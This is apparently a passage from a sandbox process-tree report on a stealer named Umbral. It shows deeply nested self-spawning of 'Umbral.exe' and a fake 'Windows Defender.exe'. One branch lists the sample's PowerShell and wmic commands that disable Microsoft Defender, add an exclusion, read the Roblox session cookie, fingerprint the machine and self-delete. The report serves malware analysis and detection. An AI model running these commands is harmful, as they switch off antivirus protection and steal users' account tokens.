        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        108⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        107⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        107⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        106⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        106⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        105⤵
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        105⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        104⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        104⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        103⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        103⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        102⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        102⤵
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        101⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        101⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        100⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        100⤵
        
        PID:5044
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        99⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        99⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        98⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        98⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        97⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        97⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        96⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        96⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        95⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        95⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        94⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        94⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        93⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        93⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        92⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        92⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        91⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        91⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        90⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        90⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        89⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        89⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        88⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        88⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        87⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        87⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        86⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        86⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        85⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        85⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        84⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        84⤵
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        83⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        83⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        82⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        82⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        81⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        81⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        80⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        80⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        79⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        79⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        78⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        78⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        77⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        77⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        76⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        76⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        75⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        75⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        74⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        74⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        73⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        73⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        72⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        72⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        71⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        71⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        70⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        70⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        69⤵
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        69⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        68⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        68⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        67⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        67⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        66⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        66⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        65⤵
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        65⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        64⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        64⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        63⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        63⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        62⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        62⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        61⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        60⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        60⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        59⤵
        
        PID:4816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        60⤵
        
        PID:4412
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        60⤵
        Views/modifies file attributes
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        60⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        60⤵
        
        PID:4364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        60⤵
        
        PID:4428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        60⤵
        
        PID:4484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        60⤵
        
        PID:2064
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        60⤵
        
        PID:3908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        60⤵
        
        PID:3444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        60⤵
        
        PID:644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        60⤵
        Detects videocard installed
        
        PID:2092
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        60⤵
        
        PID:3308
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        61⤵
        Runs ping.exe
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        59⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        58⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        57⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        57⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        56⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        55⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        54⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        54⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        53⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        52⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        51⤵
        
        PID:4860
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        50⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        49⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        48⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        47⤵
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        46⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        45⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        44⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        43⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        42⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        41⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        40⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        39⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        38⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        37⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        36⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        35⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        34⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        33⤵
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        32⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        31⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        30⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        29⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        28⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        27⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        26⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
